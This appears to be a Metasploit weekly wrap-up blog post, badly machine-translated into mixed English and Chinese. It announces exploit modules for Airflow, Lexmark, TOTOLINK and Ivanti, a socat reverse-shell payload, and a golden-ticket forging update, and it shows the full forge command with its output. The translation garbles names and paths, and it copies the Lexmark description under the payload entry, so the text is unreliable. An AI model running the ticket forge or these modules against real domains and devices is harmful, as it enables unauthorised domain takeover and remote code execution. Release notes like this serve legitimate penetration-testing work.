Metasploit Weekly Wrap-Up

最后更新于2023年9月22日(星期五)18:44:37 GMT

Improved Ticket Forging

Metasploit’s admin/kerberos/forge_ticket 模块已更新，以与服务器2022一起工作. In Windows Server 2022, 微软开始要求提供额外的新PAC元素——PAC请求者和PAC属性. 新伪造的票据将根据用户提供的域SID和用户RID自动添加必要的元素. For example:

msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f64924fb50be1e23978 domain_sid=S-1-5-21-1242350107-3695253863-3717863007 USER_RID=500 domain=demo.本地用户=管理员操作=FORGE_GOLDEN

[*] TGT MIT凭据缓存票据保存到/Users/user/.msf4 /战利品/ 20230915213733 _default_unknown_mit.kerberos.cca_219182.bin
[*] Primary Principal: Administrator@DEMO.LOCAL
Ccache version: 4

....
            Pac Requestor:
              席德:s - 1 - 5 - 21 - 1242350107 - 3695253863 - 1242350107 - 500
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: PAC_WAS_REQUESTED位没有设置
                .... .... .... .... .... .... .... ...1 Pac被隐式给出:设置pac_was_given_implicit位
            Pac Server Checksum:
              Signature: 1f94f52598b37bb9cf7e3995
            Pac Privilege Server Checksum:
              Signature: 79ec20b7d4b8e77e5c056563

域SID和用户id可以通过 auxiliary/gather/ldap_query module with the ENUM_DOMAIN and ENUM_ACCOUNTS actions.

New module content (5)

Apache Airflow 1.10.10 - Example DAG Remote Code Execution

Authors: Ismail E. Dawoodjee, Pepe Berba, and xuxiang
Type: Exploit
Pull request: #18283 contributed by ismaildawoodjee
Path: linux/http/apache_airflow_dag_rce

描述:该模块利用未经认证的命令注入漏洞，结合Apache气流1中的两个关键漏洞.10.10. The first, CVE-2020-11978, 是否在气流示例dag中发现了经过身份验证的命令注入漏洞, example_trigger_target_dag, 它允许任何身份验证的用户运行任意操作系统命令作为用户运行气流工作者/调度程序. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10允许未经身份验证的访问气流的实验性REST API来执行恶意操作，如创建上述易受攻击的DAG.

Lexmark Device Embedded Web Server RCE

作者:James Horseman, Zach Hanley和jheysel-r7
Type: Exploit
Pull request: #18333 contributed by jheysel-r7
Path: linux/http/lexmark_faxtrace_settings

说明:此漏洞增加了一个利用某些利盟设备中未经身份验证的远程代码执行漏洞的攻击模块，直至2023-02-19. 此漏洞(CVE-2023-26068)仅在以下情况下暴露, when setting up the printer or device, 当被问及是否要添加Admin用户时，用户选择“稍后设置”.

TOTOLINK无线路由器未经认证的远程命令执行漏洞

Authors: Kazamayc http://github.com/Kazamayc and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18365 contributed by h00die-gr3y
Path: linux / http / totolink_unauth_rce_cve_2023_30013

描述:这增加了一个利用TOTOLINK X5000R无线千兆路由器固件中的命令插入漏洞的攻击模块 X5000R_V9.1.0u.6118_B20201102. 这允许作为运行web服务器的用户远程执行代码. This user is typically the root user.

Ivanti Avalanche MDM Buffer Overflow

Authors: A researcher at Tenable and Ege BALCI egebalci egebalci@pm.me>
Type: Exploit
Pull request: #18321 contributed by EgeBalci
Path: windows/misc/ivanti_avalanche_mdm_bof

描述:此PR增加了一个针对Ivanti Avalanche MDM v6之前版本的攻击模块.4.1、利用缓冲区溢出条件.

Unix命令Shell，反向TCP(通过socat)

Author: jheysel-r7
Type: Payload (Single)
Pull request: #18333 contributed by jheysel-r7
Path: cmd/unix/reverse_socat_tcp

说明:此漏洞增加了一个利用某些利盟设备中未经身份验证的远程代码执行漏洞的攻击模块，直至2023-02-19. 此漏洞(CVE-2023-26068)仅在以下情况下暴露, when setting up the printer or device, 当被问及是否要添加Admin用户时，用户选择“稍后设置”.

Enhancements and features (5)

• #18294 from zgoldman-r7 改善了与网络接口交互失败时的错误信息，例如呼叫 set LHOST=.
• #18358 from zeroSteiner 这增加了一个新的ThriftClient类，用于与Thrift RPC服务交互. 它还更新了两个现有的Metasploit模块来使用它.
• #18361 from cgranleese-r7 - Updates the search 命令，并附加搜索关键字 stage: :stager: and adapter:.
• #18374 from h00die 修复了7个模块中指定 RelatedModules metadata incorrectly. Now the RelatedModules 运行时，数据正确地显示给用户 info command.
• #18377 from ErikWynter —对smtp_relay增加了一个检查 auxiliary/scanner/smtp/smtp_relay scanner module to confirm if the EHLO command is supported by the server. 如果没有，模块将尝试使用 HELO command instead.

Bugs fixed (4)

• #18359 from smashery - Updates the admin/kerberos/forge_ticket 模块用于较新的Windows Server版本，特别是2022年10月的Windows Server之后. Now, when forging Golden tickets, 伪造的PAC包含带有伪造用户SID的PAC请求者元素, and additional PAC attributes.
• #18369 from adfoster-r7 -这个PR修复了OptAddressLocal的崩溃，这是由达尔文AF_LINK的空字符串引起的 addr.
• #18370 from adfoster-r7 - This PR fixes an issue where msfrpc 更新保存的命令历史记录时会挂起吗.
• #18378 from adfoster-r7 -从Prometheus export中删除剩余的调试日志.

Documentation

您可以在我们的网站上找到最新的Metasploit文档 docs.metasploit.com.

Get it

与往常一样，您可以使用 msfupdate
自上一篇博文以来，你可以从
GitHub:

• Pull Requests 6.3.34...6.3.35
• Full diff 6.3.34...6.3.35

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
要安装fresh而不使用git，您可以使用open-source-only Nightly Installers or the
binary installers (也包括商业版).